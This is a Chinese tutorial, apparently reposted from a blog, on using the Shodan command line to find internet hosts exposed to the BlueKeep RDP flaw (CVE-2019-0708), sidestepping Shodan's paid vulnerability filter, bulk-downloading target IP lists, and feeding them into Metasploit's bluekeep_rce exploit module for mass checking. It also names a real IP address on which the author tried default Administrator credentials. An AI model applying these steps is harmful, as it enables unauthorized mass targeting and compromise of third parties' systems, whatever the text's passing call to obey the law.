当前位置: 首页 > news >正文

shodan2:绕过shodan高级会员限制+metasploit批量验证漏洞

shodan2

shodan+metasploit批量验证漏洞

shodan的这个指令语法是特别多的,那么我不可能说一个个全部讲完,因为有的参数可能你一辈子都用不上,主要就是把一些红队最常用的参数给你讲完,今天我们看看怎么去查一个cve-2019-0708的一个漏洞

shodan search --limit 10 --fields ip_str,port '"/x03/x00/x00/x0b/x06/xd0/x00/x00/x124/x00"'
十六进制字符串(类似于指纹的方式去找)

绕过shodan高级会员限制

只有高级账号才能用vuln参数,但是如果不能使用vuln参数,也可以通过发散思维来到达同样的结果,比如上面通过指纹,在比如我们指定3389端口,然后使用has_vuln:True参数确定必须有漏洞,这样大概率有cve-2019-0708的一个漏洞,当然了再加上个关键字"port:3389 Remote Desktop Protocol os:windows"就更加准确了

shodan search --limit 10 --fields ip_str,port "port:3389 Remote Desktop Protocol os:windows" has_vuln:True

![[Pasted image 20241027022845.png]]
如果可以使用vuln参数,可以直接使用

shodan download --limit 100 --fields ip_str vuln:"CVE-2019-0708" country:jp

metasploit批量验证漏洞

  • 有漏洞不代表能利用,用windows远程连接看看主机是否存活110.35.235.228远程链接出现,测试弱口令Administrator&Administrator,无法连接不过没事。
  • 我们可以使用metasploit去进行批量的漏洞利用
search 0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set rhosts file:拖入IP地址文件
checkshow targets(查看帮助文档)

![[Pasted image 20241027012246.png]]
攻击不成功有几个点给大家说一下首先show options看请我们的这个pay load,ip端口要填对,在一个就是show targets它支持windows7,sever这种,你得把targets设置正确,然后我就不演示了。怕有人干坏事好吧,这样找漏洞是不是特别的方便呢。

shodan语法:parse、downIoad

今天接着讲两个参数,一个是parse一个是downIoad(下载)
我们首先看看这个downIoad

download(下载)

查看帮助文档

 shodan download -hUsage: shodan download [OPTIONS] <filename> <search query>Download search results and save them in a compressed JSON file.Options:--fields TEXT    Specify the list of properties to download instead ofgrabbing the full banner--limit INTEGER  The number of results you want to download. -1 to downloadall the data possible.-h, --help       Show this message and exit.

使用实例

shodan download [OPTIONS] <filename> <search query>
shodan download <文件名> <搜索查询> [选项]shodan download 0708 --limit 10 --fields ip_str,port '"/x03/x00/x00/x0b/x06/xd0/x00/x00/x124/x00"'
0708是文件名有钱的直接使用vuln参数就行
shodan download cve-2019-0708 --limit 10 vuln:"CVE-2019-0708"

![[Pasted image 20241026230154.png]]

parse(解压)

shodan parse -h(查看帮助文档)Usage: shodan parse [OPTIONS] <filenames>Extract information out of compressed JSON files.Options:--color / --no-color--fields TEXT         List of properties to output.-f, --filters TEXT    Filter the results for specific values using key:valuepairs.-O, --filename TEXT   Save the filtered results in the given file (append iffile exists).--separator TEXT      The separator between the properties of the searchresults.-h, --help            Show this message and exit.

使用

shodan parse --fields ip_str <文件名>shodan parse --fields ip_str '/home/kali/桌面/cve-2019-0708.json.gz' >0708>0708表示将解压内容输入到0708文件里面

这就是一个批量刷漏洞的姿势好吧,希望大家遵纪守法,
为什么不用,shodan search vuln:cve-2019-0708这种可能是说要更高级别的账号好吧我们换种方式照样绕过它去批量刷洞

参考

【shodan(2)】https://www.bilibili.com/video/BV1ePyDYEE9b?vd_source=6a7d9c477e11fffc54155ce1c6cf0c1c

http://www.lryc.cn/news/469872.html

相关文章:

  • 【JAVA毕业设计】基于Vue和SpringBoot的母婴商城系统
  • 探索Python安全字符串处理的奥秘:MarkupSafe库揭秘
  • Xcode真机运行正常,打包报错
  • Android Audio基础——音频混音线程介绍(十)
  • 【Excel】函数各类公式总结
  • 【入门篇】2.9 系统滴答定时器 SysTick
  • BiRefNet:颠覆图像分割,AI黑科技再升级
  • 编写一个简单的Iinput_dev框架
  • ctfshow的sql注入解题思路171-211
  • 深入理解C语言中的静态库与动态库 —— 原理与实践
  • 本地缓存库分析(一):golang-lru
  • qt配置https请求
  • C语言进阶——文件操作
  • MYSQL-查看用户权限语法(二十一)
  • 在MySQL中存储IP地址的最佳实践
  • Vite打包配置
  • node集成redis (教学)
  • 江协科技STM32学习- P22 实验-ADC单通道/ADC多通道
  • RL学习笔记-马尔可夫过程
  • LeetCode Hot 100:动态规划
  • 使用Python制作雪景图片教程
  • S-Function
  • 如何具备阅读JAVA JDK虚拟机源码能力
  • Python | Leetcode Python题解之第514题自由之路
  • Docker 镜像下载问题及解决办法
  • 2分钟搞定 HarmonyOs Next创建模拟器
  • 方形件排样优化与订单组批问题探析
  • vue3组件通信--自定义事件
  • ubuntu 安装k3s
  • SQL CHECK 约束:确保数据完整性的关键